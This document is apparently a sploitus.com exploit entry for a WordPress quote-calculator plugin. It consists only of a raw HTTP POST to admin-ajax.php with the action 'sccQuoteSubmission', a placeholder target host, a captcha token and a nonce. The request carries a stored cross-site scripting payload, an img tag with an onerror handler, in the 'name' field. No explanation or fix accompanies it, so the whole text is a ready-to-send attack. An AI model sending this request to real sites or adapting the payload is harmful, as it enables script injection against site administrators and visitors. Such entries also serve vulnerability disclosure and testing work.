## https://sploitus.com/exploit?id=WPEX-ID:73353221-3E6D-44E8-BF41-55A0FE57D81F
POST /wp-admin/admin-ajax.php HTTP/2
Host: {host_here}
Content-Length: 3486
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZd2EwaHqKpbMHz57
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://{host_here}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://{host_here}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="action"

sccQuoteSubmission
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="data"

[["name","flav<img src=x onerror=alert('xss')>"],["email","flaviu@engineer.com"],["phone","0742331337"],["g-recaptcha-response","03AFY_a8WYO44HYrIQz9Blk3_IBcdKUHEp_HJ8IJrUv1XKYTBMhbWfuX1tvUthoTidzvjr-Q7D6LtHgEQzVNSIZm_S2YBQCA4DO2NWlKMZ2mMjPYjGxE4eeJD4PNO1nF8Odj0B9uy8w7Iy3FZyCV5FS-82pi75YCg5ypfbMNjrmaGy38WUqxUVKBe7uEOgqYsT8QEc6BfZK3I6mVYKtSIim4b-QkVDd9OuWceOZqzrhMKSb7F9O-QI_AE1qgjr8eHYklyd75Ji-ozK45AknebATX3W1hSOZ0w5Rbs8IRH5F0HYfnPaDpoicIwDM84x_hwCxUqD3y_RXxXxDzK4txVajWTWzKJo93guG63OLyd1tR7ea8BdmGe-EZFVdmy61jT-LG4x6NQVVCTmT71o4fqpezo-IFxRcbH-L-sIAGNNDDZDIf5yJcfguxJVZ30SYOekCaAmlrIr1BtLIL3O9fzJda_yu-gXPCi-qf_I4I7STC8FStVNIuoH4AMZAadeizJYnpgrn4srZ_t0"]]
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="quote_data"

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
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="calcId"

12
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="captchaResponse"

03AFY_a8WYO44HYrIQz9Blk3_IBcdKUHEp_HJ8IJrUv1XKYTBMhbWfuX1tvUthoTidzvjr-Q7D6LtHgEQzVNSIZm_S2YBQCA4DO2NWlKMZ2mMjPYjGxE4eeJD4PNO1nF8Odj0B9uy8w7Iy3FZyCV5FS-82pi75YCg5ypfbMNjrmaGy38WUqxUVKBe7uEOgqYsT8QEc6BfZK3I6mVYKtSIim4b-QkVDd9OuWceOZqzrhMKSb7F9O-QI_AE1qgjr8eHYklyd75Ji-ozK45AknebATX3W1hSOZ0w5Rbs8IRH5F0HYfnPaDpoicIwDM84x_hwCxUqD3y_RXxXxDzK4txVajWTWzKJo93guG63OLyd1tR7ea8BdmGe-EZFVdmy61jT-LG4x6NQVVCTmT71o4fqpezo-IFxRcbH-L-sIAGNNDDZDIf5yJcfguxJVZ30SYOekCaAmlrIr1BtLIL3O9fzJda_yu-gXPCi-qf_I4I7STC8FStVNIuoH4AMZAadeizJYnpgrn4srZ_t0
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="disableUnitColumn"

false
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="showFormInDetail"

false
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="quoteRecipient"

1
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="emailValidationToken"

email_temp_r9UGTEn0Qz
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="nonce"

1c6a03bebd
------WebKitFormBoundaryZd2EwaHqKpbMHz57
Content-Disposition: form-data; name="sendQuoteFormDataToUser"

1
------WebKitFormBoundaryZd2EwaHqKpbMHz57--